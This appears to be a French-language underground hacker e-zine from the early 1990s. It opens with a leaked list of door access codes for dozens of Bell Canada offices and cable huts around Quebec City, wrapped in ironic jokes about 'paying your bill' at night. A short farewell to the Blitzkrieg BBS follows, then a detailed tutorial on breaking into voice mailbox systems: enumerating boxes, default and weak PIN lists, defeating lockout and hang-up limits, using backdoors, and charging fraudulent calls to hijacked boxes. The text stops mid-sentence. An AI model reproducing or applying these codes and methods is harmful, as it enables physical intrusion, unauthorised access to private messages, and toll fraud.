la soci‚t‚". Pas de problŠme, leur ai-je dit, je vais recommander
aux gens d'aller payer leurs comptes de Bell. Tu peux pas ˆtre plus
civique que ‡a, me semble. Et une fois n'est pas coutume. On sait
que la compagnie a un NORME besoin d'argent, alors...

Alors, les amis, allez payer vos comptes aux bureaux du Bell de
votre r‚gion. Mais si, par hasard, vous arrivez, excellents
citoyens que vous ˆtes, … la porte d'un bureau du Bell et que
personne ne r‚ponde … vos sonneries, voici les codes des portes de
TOUS les bureaux du Bell de la grande r‚gion de Qu‚bec. Vous
pourrez ainsi aller payer vos comptes … toute heure du jour ou de
la nuit. Surtout la nuit...

J'ai trouv‚ ce petit carnet lors d'un trash en solitaire. Il s'agit
fort probablement d'une liste distribu‚e aux techniciens qui font
l'entretien de tous les systŠmes de ces endroits. La liste n'est
plus valable, apparemment, depuis le 1er f‚vrier, mais ‡a
m'‚tonnerait BEAUCOUP que tous les num‚ros soient chang‚s … chaque
mois...

Alors, voici cette liste. Je me suis dit que ‡a pourrait vous ˆtre
utile. Vous pourrez ainsi entrer et laisser votre paiement sur le
coin d'un bureau, et repartir aussi vite sans rien toucher...


LISTE DES CODES DES PORTES PRIODE DU 4 JANVIER AU 1ER FVRIER

S.P.A.C pour tous les bureaux 2-4-6-8

Toutes les salles bƒtiments 32-15

St-R‚al (entr‚e) 42-13

St-R‚al (‚tages) 21-4

St-R‚al (DMS) 15-32
(B23, B30, 203, 206, 209, 216)

St-R‚al Comm. Inform. (519) 13-24

D'Aiguillon (Entr‚e) 23-54

D'Aiguillon (Int‚rieur) 24-15

D'Aiguillon (B222, Cos) 13-24

D'Aiguillon (Comm. Inform.) 13-24

St-Cyrille (Entr‚e) 53-42

St-Cyrille (2Š ‚tage) 42-13

St-Cyrille (DMS, salle conf.) 13-42

Vanier - Rue Plante (DMS-1U) 53-42

Vanier - Rue Godin (CCD) 53-42

Ste-Foy (ext.) 41-35

Ste-Foy (int.) 35-2

Ste-Foy (cadenas) N/A

Cap-Rouge OPM (Provencher)
quipement 5-2-9-3
R‚partiteur 1-8-3-9

Cap-Rouge OPM (Des Chasseurs)
quipement 1-8-3-5
R‚partiteur 5-1-3-7

Cap-Rouge (DMS-1U) Des Clercs 3-6-9-2

L‚vis 23-41

L‚vis (RCU) 4-0-0-1/
1-0-0-4

St-Jean Chrysostome 23-41

Charny 23-41

St-Romuald 23-41

St-Romuald (int.) 42-3

St-Nicolas 23-41

St-Nicolas (DMS 1U) 1-0-0-4/
4-0-0-1

Beaumont hutte 34-12

Hutte St-Etienne 34-12

Breakeyville DMS-1U 4-0-0-1

Loretteville (ext.) 43-25

Loretteville (int.) 15

Loretteville DMS-1U 1-4-0-8

Ste-Catherine 43-21

Ste-Catherine (DMS-1U) 1-4-0-8

Ancienne-Lorette 15-24

DMS-1U Anc.-Lor. 1-4-0-8

Hutte Ste-Famille 31-42

Valcartier 54-23

DMS-1U Valcartier 1-4-0-8

Charlesbourg 34-25

Charlesbourg int. 41-2

Charlesbourg DMS-1U 4-3-1-2

N. D. Laurentides 34-25

N. D. Laurentides (DMS-1U) 4-3-1-2

Stoneham 34-25

Parc Laurentides 21-4-3

Tewkesbury (DMS-1U) 4-3-1-2

Beauport 21-34

Boischatel 52-31

Ste-Brigitte 52-34

Ste-Anne-de-Beaupr‚ 51-24

St-Tite 13-42

St-Fereol 54-32

Hutte Mt-Ste-Anne 25-42

St-Jean I.O. 51-42

Ste-Petronille I.O. 12-43

Hutte Ste-Famille 31-42


Bon, je crois que les huttes, ce sont les petites cabanes situ‚es
au coins des rues, ici et l…, et qui ne contiennent que les
"manholes" pour acc‚der aux cƒbles. Vous ne pourrez pas aller payer
vos comptes du Bell l…, donc. Mais les autres bureaux, c'est...

Comment?

On ne peut pas aller comme ‡a payer ses comptes au bureau du Bell?
Qu'est-ce que tu racontes, Atreid!?

Ah?

Bon... Mais qu'est-ce qu'ils peuvent faire avec tous ces codes que
j'ai trouv‚?

Pardon?

Mais c'est ill‚gal, ‡…! Les gens ne peuvent pas faire ‡a, voyons!


Phoque! Et moi qui croyais faire preuve de civisme aujourd'hui!

<grin>
<re-grin>
<very big grin>




ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

DRING DRING, C'EST POUR JULIE
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ




LA FIN DE BLITZKRIEG BBS

par

Blitzkreig

Nous en avons parl‚ plusieurs fois dans les num‚ros pr‚c‚dents, …
chaque fois pour vous dire tout le bien qu'on en pensait:
BLITZKRIEG BBS, qui avait ses assises au Kentucky, a ferm‚ ses
portes. Au retour des fˆtes, Predat0r a d‚cid‚ de fermer boutique,
laissant dans le deuil des centaines de pirates et d'afficionados
de l'informatique "alternative". Lorsque, aux environs du 7
janvier, j'ai appel‚ sur la ligne de BLITZKRIEG, je suis tomb‚ sur
un enregistrement, et c'est la gorge serr‚e par l'‚motion que j'ai
appris la triste nouvelle. J'ai traduit pour vous le contenu du
message...

-----

Bonjour, je suis John, ou Predat0r, ex-sysop du Blitzkreig
BBS. J'aimerais vous dire que … compter du 12 janvier, … 17h00, le
502-499-8933 sera d‚sactiv‚, ce qui voudra dire que le systŠme est
disparu.
Si jamais j'installe une nouvelle ligne, sous un nouveau
num‚ro, je posterai l'information sur Pentavia, Ripco, et quelques
autres systŠmes populaires. J'aimerais remercier tous ceux qui nous
ont appuy‚ lorsque le systŠme ‚tait ouvert.
Depuis le mois de f‚vrier 1990, jusqu'en janvier 93, nous
avions re‡u 27,834 appels. Le dernier usager officiel ‚tait
Sinister Solution.
Si jamais le systŠme repart, il sera plus gros, meilleur, et
plus underground encore qu'il ne l'avait ‚t‚.
Je me retire donc officiellement en tant que Predat0r et je
ferme officiellement BLITZKRIEG. Si jamais le systŠme r‚-ouvre, ce
sera sous un nouveau nom et avec un nouveau pseudonyme.
Si vous d‚sirez tout de mˆme me rejoindre, la boŒte postale
est encore valide, et si vous voulez me contactez par voix,
d‚brouillez-vous pour trouver le num‚ro.
Stay free, et nous nous reverrons bient“t...

-----

Sortez les mouchoirs, les mecs... Heureusement, il reste encore
quelques bons boards sur lesquels nous pouvons aller tromper notre
peine. Je pense entre autres … Cybernetic Violence, sis … l'Ile des
Soeurs, prŠs de Montr‚al (c'est justement le board que visite Santa
Claus ce mois-ci).
Bien qu'il n'en ait pas fait mention dans son texte, on peut quand
mˆme supposer que Predat0r a pos‚ ce geste … la suite de la
parution du plus r‚cent bouquin de Bruce Sterling, THE HACKER
CRACKDOWN (trŠs bon, au demeurant). Sterling le d‚crit entre autres
comme une des personnalit‚s de l'underground les plus respect‚es.
Predat0r avait repris, en 1990, la parution de TAP (Technical
Assistance Program), le grand-pŠre de tous les 'zines underground.
TAP avait vu le jour en 1971, … Greenwich Village (NY). Le premier
‚diteur de TAP n'‚tait autre que le regrett‚ Abbie Hoffman, le pŠre
du mouvement hippie, le pape du "protest mouvement"... On est en
bonne compagnie, l…, les enfants...

Outre le fait que Predat0r ‚tait lui-mˆme une "vedette", son board
‚tait fr‚quent‚ par tout ce que la planŠte supporte comme pirates
chevronn‚s. Les handles les plus glorieux se croisaient sur ce
board...
Et c'est ici que je suis le plus impressionn‚, je crois:
contrairement aux pirates qui aiment bien faire des gorges chaudes
devant les cam‚ras, et qui sont tout … fait "partiaux" au
vedettariat, John, lui, a cru bon de s'‚clipser de la scŠne, le
temps que les projecteurs "de la gloire" se tournent vers une autre
victime. Je salue la modestie non-feinte de ce mec qui, … force de
d‚termination et de travail, s'est hiss‚ au faŒte de sa
"profession". L… o— certains cherchent … gagner leurs galons de
pirate en crƒnant et en racontant des bobards, une telle attitude
fait plaisir … voir...

Prenez-en de la graine, les kids...


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

LA OU LA TECHNOLOGIE LE PERMET
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



L'ABC D VMB
Par Mental Floss

Vous avez d‚j… rˆv‚ de poss‚der votre propre vmb? Vous avez
d‚j… essay‚ de hacker une vmb, mais vous n'ˆtes jamais parvenu …
triompher? Les lignes qui vont suivre renferment la m‚thode miracle
de: 'comment pogner avec les VMBs'.

Cette introduction ressemble ‚trangement aux annonces que l'on
peut retrouver dans tous les journaux et magazines bidons (y
compris Pif Gadget). On promet de r‚v‚ler le secret de comment
avoir des seins plus fermes ou bien comment voir au travers de
trois murs de ciment avec un stylo. C'est s–r qu'on peut se trouver
une VMB en gossant, on peut toujours composer les passwords de 0000
… 9999 dans l'espoir de trouver quelque chose. Mais c'est une
m‚thode stupide, il existe une fa‡on bien plus simple de proc‚der
qui vous fera ‚conomiser du temps. Bon assez de blabla et passons
aux choses s‚rieuses.


-/- D‚finition ->

VMB une seule d‚finition: Voice Mail Box.
En fran‡ais: BoŒte Vocale...


-/- Qu'est-ce qu'un systŠme de VMBs? ->

On peut comparer un systŠme de VMB … un gros r‚pondeur …
distance, qui contient plein de petits r‚pondeurs. Certains
systŠmes sont install‚s sur des PCs. De nos jours, on peut se
procurer un systŠme complet (le soft et la carte), pour environ
250$. Par contre il faut avoir un gros hard disk, car une minute de
messages compress‚s prend environ 200k. Donc imaginez un systŠme de
500 usagers, ayant un greetings d'une minute chaque et 5 messages
de 2 minutes de sauvegard‚s...


-/- A quoi servent les VMBs? ->

A part de servir … ˆtre hack‚es.. .
Les compagnies installent g‚n‚ralement un systŠme de VMBs pour
que leurs employ‚s puissent se laisser des messages priv‚s entre
eux. Aussi on les utilise pour permettre aux clients de laisser un
message … la personne qu'ils essaient de rejoindre, mais qui n'est
pas disponible lors de l'appel. Certaines compagnies s'en serviront
aprŠs les heures de bureaux, ainsi ils ne manqueront aucuns de
leurs clients. Donc la VMB est un outil trŠs important pour ces
compagnies.


-/- Les diff‚rents moyens de rejoindre une VMB ->

Votre VMB pr‚f‚r‚e peut se rejoindre de deux fa‡ons
diff‚rentes, soit en composant un num‚ro local ou un 1-800. Peu
importe si elles sont locales ou pas, elles roulent sur des
systŠmes de principe semblable: plusieurs boŒtes o— l'on peut
laisser des messages … des personnes diff‚rentes.


-/- Qui offre un service de VMB? ->

G‚n‚ralement vous pouvez obtenir une VMB tout … fait
gratuitement, si la compagnie pour laquelle vous travaillez possŠde
son systŠme. Aussi certaines compagnies priv‚es offrent des
services de messagerie vocale, entre autres les compagnies de
locations de pagettes et de t‚l‚phones cellulaires. Bell Canada
vous offre aussi un systŠme local de VMB, mieux connu sous le nom
de T‚l‚-Messageries Bell.


-/- Pourquoi hacker une VMB? ->

Certains se demanderont s–rement … quoi cela sert de hacker
une VMB. Les possibilit‚s sont infinies, l'avantage principal
d'avoir une VMB est qu'on peut se faire rejoindre par n'importe qui
appelant d'Am‚rique, et ce sans frais pour la personne qui appelle,
… condition d'avoir une VMB 1-800, qui est rejoignable en dehors du
Canada. On a juste … penser... tu rencontres quelqu'un sur un bbs,
et tu ne veux pas lui donner ton vrai num‚ro, tu lui donnes ton
num‚ro de VMB et voil…... Si t'as quinze petites filles qui te
courrent aprŠs, mais que tu veux garder ta ligne pour scanner...tu
leurs donnes ton num‚ro de VMB, comme ‡a elles pourront te laisser
des beaux messages dans le genre de 'Salut beaut‚...'

Mais … part les exemples inutiles mentionn‚s ci-haut, on peut
utiliser sa VMB … des fins plus LGALES... Par exemples, runner une
'codeline' ou faire des 'free calls'.

Codeline? Une codeline, est une VMB qu'on utilise pour donner
et recevoir des codes (Pbx,Outdial,NUI,CC# etc) ou toutes autres
informations. Les codes que les gens laissent sur la VMB seront
plus tard post‚s par le propri‚taire de cette boŒte, et ainsi les
informations seront renouvell‚es r‚guliŠrement.

Free calls? Vous connaissez tous le principe de faire charger
un appel sur un troisiŠme num‚ro, donc vous utilisez votre VMB
comme troisiŠme num‚ro lorsque vous faites des appels … partir
d'une cabine t‚l‚phonique. Le principe est simple, comme greetings
vous enregistrez le message suivant: 'Op‚rateur, ce num‚ro accepte
les frais d'appel'. Et voil…, vous venez de faire charger votre
appel sur votre VMB.


-/- Comment trouver un systŠme de VMB? ->

Avant de penser … hacker une box, il est capital d'avoir un
systŠme dans lequel on peut hacker dedans, c'est comme ‚vident. Le
seul moyen de trouver un systŠme, c'est de scanner. Soit que tu
prends un pr‚fix dans lequel que t'es s–r qu'il y a une compagnie
et tu scannes dedans. Soit que tu scannes avec ToneLoc le speaker
… 'ON' et espŠre d'entendre quelques systŠmes parmis les 10000
num‚ros … composer. Et finalement la m‚thode la plus simple est
d'utiliser des num‚ros qu'on a d‚j… scann‚ avec ToneLoc. Le
principe est simple, tu prends ton TONE.LOG et tu recomposes
manuellement tout les VOICE (1) jusqu'… temps de trouver quelque
chose. ApþŠs plusieurs heures de scanning … la mitaine, on a
constat‚ que 90% des systŠmes de VMB ‚taient sur des VOICE (1),
quelque fois sur des TIMEOUT (1), rarement sur BUSY/UNKNOWN et
jamais sur d'autres choses, mˆme pas sur un VOICE (2) ou TIMEOUT
(2). Tout ‡a r‚alis‚ avec le GETDELAY de ToneLoc … 50, … l'aide
d'un modem USR HST sett‚ … ATX6. Si vous avez des modems 2400 qui
ne d‚tectent pas les vrais VOICE et les vrais BUSY, ben oubliez ‡a
et achetez-vous un VRAI modem.

Il est important de v‚rifier si le systŠme est 24 heures ou
bien seulement aprŠs les heures de bureau. Pour se faire vous avez
seulement … essayer de rejoindre le systŠme en plein jour; une
petit bonne femme r‚pond? Le systŠme est alors seulement actif
apþŠs les heures de bureaux, commun‚ment appel‚ 'after hours'. Si
vous trouvez un systŠme after hours, ne perdez pas votre temps …
hacker dedans, ‡a ne vaut pas la peine. A part bien s–r si vous
trouvez un outdial.


-/- Les modes d'accŠs … la VMB ->

Avant de hacker, il faut savoir comment atteindre la
messagerie. La messagerie peut s'acc‚der en deux modes diff‚rents,
soit si on veut laisser un message … quelqu'un ou soit si on veut
acc‚der … notre box. Pour laisser un message … une box on peut
faire: composer le num‚ro pendant le message d'entr‚e et/ou faire
# ensuite, * ou **. Un message nous dira alors … quelle box on veut
envoyer un message. Pour acc‚der … sa box on fait g‚n‚ralement #,
## ou *7 ensuite on a un message disant d'entrer son num‚ro et son
mot de passe. Il existe aussi d'autres fa‡ons d'acc‚der … ces
modes, il suffit d'‚couter le message d'entr‚e et la plupart du
temps on explique comment.


-/- Comment trouver une box? ->

Pour hacker une box, il faut avoir une box … hacker bien s–r.
Mais avant de hacker une box, il y a quelques petites choses qui
seraient int‚ressantes de savoir si on veut sauver du temps: de
combien de chiffres est le num‚ro de la box? La box peut-elle
commencer par tous les chiffres? Si non par lesquels?

Si un num‚ro de box est valide, soit que:
-vous entendez le message du bonhomme
-‡a sonne pis le bonhomme r‚pond
-‡a sonne pis ‡a dit que le bonhomme est pas l… et vous
pouvez laisser un message.
-‡a dit: Mailbox XXXX.
-en mode 'accŠs … la box' ‡a dit: 'Enter your password'.

Si la box est invalide...
-‡a dit que la box est invalide
-que ce num‚ro n'existe pas
-et tout autres choses du genre....

Mais attention sur certains systŠmes en mode 'accŠs … la box',
que vous entriez n'importe quel num‚ro de box, on vous demande
toujours un mot de passe ensuite. Et cela mˆme si le num‚ro de la
box n'est pas valide. Dans cette situation, le seul moyen de
v‚rifier si la box est valide, est de composer le num‚ro en
question en mode 'laisser un message'.

En g‚n‚ral les boxes sont de 3 ou 4 chiffres, parfois 2 ou 5
mais c'est plut“t rare. Pour trouver de combien de chiffres est la
box, il suffit d'entrer dans la messagerie par n'importe quelle des
deux modes et composer des chiffres jusqu'… temps d'entendre le
message d'une box, se faire transf‚rer … cette extension ou bien un
message disant que le num‚ro de la box est invalide. Parfois en
mode 'laisser message', on entre 4 chiffres et on se fait dire que
c'est invalide, mais si on va essayer la mˆme chose en mode 'accŠs
… la box' apþŠs 3 chiffres entr‚s, si on se fait dire que le num‚ro
est invalide ‡a veut dire que la box est vraiment de 3 chiffres et
non 4. En g‚n‚ral, c'est une tƒche trŠs facile de trouver de
combien de chiffres est le num‚ro des boxes. Parfois mˆme, on dit
clairement: 'Composez l'extention de quatre chiffres et faites #'

Les boxes peuvent ˆtre situ‚es entre 1000 et 9999 (100 et 999
pour un 3 chiffres). Une premiŠre fa‡on d'‚liminer des secteurs …
chercher, si les boxes se rejoignent en composant leur num‚ros …
l'entr‚e, est de v‚rifier que lorsqu'on pŠse sur une touche, on est
pas connect‚ … une boxe ou service direct. Exemple, je pŠse sur 0
et l'op‚ratrice embarque, donc c'est s–r qu'il n'y a pas de boxe
qui commence par 0. Je pŠse sur 1, j'ai des informations sur la
compagnie, sur 2 une bonne femme veut prendre ma commande... et
ainsi de suite. Donc on sait qu'il n'y aura aucune box commen‡ant
par 0-1-2 etc... S'il n'y a aucun num‚ro d'‚limin‚, commencez par
1000 et montez par coup de mille jusqu'… 9000, si rien encore
commencez … 1000 par coup de 100 jusqu'… 9900. Si le systŠme a des
boxes de 3 chiffres, allez-y par 100 et ensuite 10. ATTENTION, sur
la majorit‚ des systŠmes, si vous faites plus de 3 erreurs, le
systŠme vous raccroche. Voir plus bas pour savoir comment
contourner cela.

La plupart des boxes sont regroup‚es ensemble dans le mˆme
coin, et la plupart du temps entre 1000 et 2000 ou 4000-5000, mais
‡a varie. En g‚n‚ral, la boxe de l'administrateur du systŠme est
entre 9000-9999, g‚n‚ralement c'est 9999. J'utilise souvent les
termes 'la plupart du temps/g‚n‚ralement', parce que la majorit‚
des fois c'est vrai mais ‡a d‚pend toujours de l'humeur du
sysadmin. Par contre, vous ne trouverez pas 20 boxes … la suite, la
plupart du temps les boxes sont espac‚es de 3-4 chiffres, pour
d‚courager les hackers. Aussi sur certains systŠmes, un r‚pertoire
de tous les usagers est disponible, soit en faisait 9, 1 ou *1. Si
un r‚pertoire est disponible, il sera annonc‚ comment y acc‚der
dans le message d'entr‚e. Le principe du r‚pertoire est qu'… l'aide
des touches du t‚l‚phone, vous entrez les 3 premiŠres lettres du
nom/pr‚nom de la personne recherch‚e. Dans cette situation, entrez
comme lettre 2 (ABC) et faites #. S'il y a pas trop de noms ou ben
que le systŠme est mal fait, vous pourrez avoir accŠs … toute la
liste des usagers. Par contre, s'il n'aime pas seulement le 2,
faites 2 5 8 et #. En g‚n‚ral, il y a toujours des noms dans cette
zone. Si le systŠme dit : 'there's more than one name' faites #.
Soit qui te donne les noms (s'il y en a moins que cinq) ou ben qui
te dit: 'there're too many names'. En gossant avec ‡a, il y a
toujours moyen de trouver quelques choses.


-/- J'ai trouv‚ un paquet de boxes, lesquelles je hack? ->

Quand tu trouves une boxe, elle peut ˆtre dans deux ‚tats:
occup‚e ou libre. Vous pouvez hacker n'importe quelles boxes, mais
si vous d‚cidez d'en garder une, elle doit absolument ne pas
appartenir … personne, c'est ce qu'on appelle une Free Box.

Le principe des Free Boxes est le suivant: c'est une boŒte qui
traŒne sur le systŠme et qui n'appartient … personne. En g‚n‚ral,
le sysadmin cr‚e une dizaine de ces free boxes sur le systŠme.
Pourquoi vous me dites? Parce que tous les sysadmins sont paresseux
et lorsqu'un nouvel employ‚ est engag‚, ils n'ont pas besoin de se
forcer le cul pour trouver une place de libre et cr‚er une nouvelle
box. Ils ont juste … donner au nouvel employ‚ la premiŠre free box
de la liste. Donc si vous trouvez 10 free boxes sur un systŠme, il
est toujours pr‚f‚rable de s'approprier la derniŠre ou l'avant-
derniŠre.

€a peut ˆtre long et laborieux de trouver une free box, car
elles sont en nombre limit‚ et on a de grandes chances de se faire
couper aprŠs trois erreurs. C'est l… que ‡a devient int‚ressant de
hacker les boxes d‚j… occup‚es. Dans une boxe, on retrouve
g‚n‚ralement l'option 'Make a Distribution List', cette option
permet de cr‚er une liste contenant les num‚ros de boxes des autres
usagers auxquels on veut envoyer des messages. C'est le mˆme
principe qu'un Group mail ou Mass Mail, envoyer un message … 10
personnes en composant seulement le num‚ro de la liste voulue. Donc
avec cette liste on peut entrer tant de num‚ros qu'on veut sans se
faire raccrocher et on sait si le num‚ro est valide ou pas.

Pour sauver du temps, lorsque vous hackez des boxes d‚j…
utilis‚es, il est bon de faire un tri avant. A chaque box valide,
‚coutez le message: si c'est une femme qui parle, si le gars a
vraiment l'air niaiseux ou si y a des problŠmes d'enregistrement
(on dirait qu'il est … 50 pieds du t‚l‚phone, pŠse sur 4-5 touches
avant de trouver la bonne pour sauver le greetings) ou toutes
autres personne qui … l'air d'un deux de pique, prenez son num‚ro
en note. Il y a de forte chance qu'il ait choisi un mot de passe
aussi stupide que lui.


-/- Comment faire pour savoir si c'est une Free Box ->

En g‚n‚ral les free boxes, n'ont pas de messages d'annoncement
(greetings). Aucun nom n'a ‚t‚ assign‚ … la boŒte. Donc si vous
composez un num‚ro et ‡a dit: MAILBOX XXXX, il y a des bonnes
chances qu'elle soit free. De plus, si vous ˆtes en mode 'accŠs …
la box' et que lorsque vous entrez un num‚ro ‡a dit: 'This voice
mail system will increase your...blabla...Please enter the password
assigned to you by your system manager....', c'est officiel que
cette box est free. Mais si ‡a dit: 'Tony Lamothe, Please enter
your password...', la box est comme occup‚e...change de box...

Parfois la box est occup‚e mais n'a pas de greetings
d'enregistr‚. Si vous entrez dans la boxe et vous trouvez un paquet
de messages r‚cents, changez de box...


-/- Comment trouver le mot de passe de la free box en question ->

Lorsqu'on hack une free box, il ne faut pas se casser la tˆte
… essayer des mots de passe compliqu‚s. En g‚n‚ral, les free boxes
ont des mots de passe trŠs faciles … retenir, car la majorit‚ des
sysadmins n'ont mˆme pas leur secondaire cinq; pensez-vous qu'ils
seraient capable de retenir un mot de passe de dix chiffres random
pendant cinq mois? Non. Donc le principe est d'essayer des mots de
passe vraiment niaiseux. De plus, la majorit‚ des systŠmes de VMBs
ont des mots de passe par d‚faut pour les free boxes. La liste qui
suit donne les mots de passe … essayer.

Mots de passe par d‚faut:
-------------------------
Le mot de passe est pareil que le num‚ro de la box.
exemple: box = 2637 pwd = 2637

Le mot de passe est l'inverse du num‚ro de la box.
exemple: box = 3279 pwd = 9723

Le mot de passe est le num‚ro de la box plus un 0. Cette
m‚thode est trŠs poupulaire avec les systŠme de type ASPEN.
exemple: box = 627 pwd = 6270


Autres mots de passe … essayer:
-------------------------------
0000 TrŠs fr‚quent
1111 Fr‚quent
9999 Fr‚quent
1234 Les usagers aiment bien ce mot de passe!
4321
2222
3333
4444
5555
6666
7777
8888
9999

Si la box a plus de 4 chiffres, rajouter des chiffres pour que
la longueur du mot de passe ‚gale la longueur du num‚ro de la box.
Exemple: box = 35373, essayez genre 12345 ou 11111.

Si cela ne marche pas, essayer tous autres mots de passe que
vous trouverez pertinents. Essayez surtout des s‚quences de
chiffres, genre 4567, 8765, 1122, ou 7337. Dans certains cas il
peut y avoir aucun mot de passe sur la box! Une chose … retenir, ne
perdez pas 2 heures … gosser sur un mot de passe qui semble
impossible … trouver. Quand vous avez essay‚ les mots de passe par
d‚faut et certains autres, et que vous voyez que cela ne donne
rien, changer imm‚diatement de systŠme. Ne perdez pas votre temps
sur des causes perdues, il existe tellement d'autres systŠmes de
VMBs. Vous aurez juste … re-scanner un peu et de nouveau vous
pourrez d‚plomber une autre box vierge.

Sur certains systŠmes, on peut savoir quelle est la longueur
du mot de passe. Si apþŠs quatre chiffres entr‚s, vous entendez un
message disant que le mot de passe est invalide, il y a de fortes
chances que le mot de passe soit de quatre chiffres. Par contre un
systŠme comme 'Message Center' vous donnera un message d'erreur
lorsque vous aurez entr‚ un chiffre de plus que la longueur du mot
de passe. Mais attention, certains systŠmes attendent 2-3 secondes
avant de dire si le mot de passe est invalide ou pas, donc il est
quasiment impossible de deviner la longueur du mot de passe. Sur
d'autres vous devrez faire # pour valider le mot de passe, donc
encore ici aussi c'est presque impossible. Dans 80% des cas, les
mots de passe sont de quatre chiffres, donc essayez plus souvent
des mots de passe de cette longueur.

Parfois, certains systŠmes bloquent carr‚ment l'accŠs … la box
lors d'erreurs r‚p‚t‚es. Lorsque vous entrez 3 mauvais mots de
passe de suite, la box se barre automatiquement. Le seul moyen de
r‚ussir … entrer de nouveau est de demander au sysadmin. C'est un
trŠs bon moyen de protection, mais il est rarement utilis‚.

Dans de rares occasions, le systŠme peut contenir une backdoor
qui permet d'entrer dans n'importe quelle box, mˆme si on ne
connaŒt pas le mot de passe. Si lorsque vous ˆtes en mode 'laisser
message', vous composez un num‚ro et que rien ne se passe mais
qu'au bout de 5-6 secondes ‡a raccroche, il y a de fortes chances
que ce soit une backdoor. Pour l'utiliser, vous avez juste …
composer le num‚ro de la backdoor suivit du num‚ro de la box
d‚sir‚e et bingo le tour est jou‚.


-/- Comment d‚jouer la passe du Hang-Up apþŠs trop d'erreurs ->

Sur certains systŠmes ‡a marche, sur d'autre ‡a marche …
moiti‚ ou pas du tout. Il y a des hang-ups … cause de trop
d'extensions invalides ou bien trop de mots de passe erron‚s. Pour
contourner le hang-up apþŠs trop de boxes invalides, c'est trŠs
simple: il suffit d'entrer un num‚ro de box valide … tous les deux
boxes invalides et ainsi de suite. Au d‚but on peut se faire hang-
uper plusieurs fois avant de trouver un num‚ro valide.

Exemple: je sais que 1234 est une boŒte valide.
je fais 2500...box invalide
je fais 2600...shit invalide
je fais 1234...cool valide et on recommence..
2700...invalide
2800...invalide
1234...Ok, vous comprennez le principe?

En g‚neral, apþŠs trois mauvais mot de passe on se fait hang-
uper... Donc, sur certains systŠmes, aprŠs deux erreurs t'as juste
… faire * et tu vas revenir au message d'entr‚e. Et ainsi tu peux
recommencer autant de fois que tu veux. Parfois, * ne marche pas
donc t'es oblig‚ de rappeler … tous les coups.

Des fois vous pouvez utiliser ces trucs dans les deux modes,
i.e: * marche pour le mode 'laisser msg' et le num‚ro valide marche
pour 'accŠs … la box'.


-/- Que fais-je une fois la box d‚plomb‚e? ->

Plus on prend de pr‚cautions, plus notre box va durer
longtemps. C'est s–r que si tu t'appropries la box d'un usager, ‡a
sera pas long que tu vas l'avoir perdue. Le gars quand il va
essayer d'acc‚der … sa boŒte et qu'il va voir que son mot de passe
et son greetings sont chang‚s, va imm‚diatement contacter le
sysadmin. Le sysadmin sera averti qu'il y a du monde qui essaye de
hacker le systŠme et renforcera les mesures de s‚curit‚. Donc c'est
pour cela qu'il ne faut jamais et je dis jamais, prendre une box
d‚j… occup‚e. Par contre si tu entres dans la box de quelqu'un et
que tu trouves 10 nouveaux messages datant de 3 mois, il y a de
fortes chances que la personne n'utilise plus sa box. Donc c'est
seulement dans cette situation qu'on peut prendre une box non free.
€a peut prendre un bon moment avant que quelqu'un s'aper‡oive de
quelque chose d'anormal, si t'as hack‚ une free box.

Ok, premiŠre chose que tu fais une fois que t'as une free box,
tu touches … RIEN. Ne change rien, appelle r‚guliŠrement la box
pendant 2-3 jours ouvrables, pour voir s'il y a des nouveaux
messages. Si oui, oublies-‡a et changes de box, sinon cette fois
changes seulement le mot de passe et rev‚rifies encore pendant 2-3
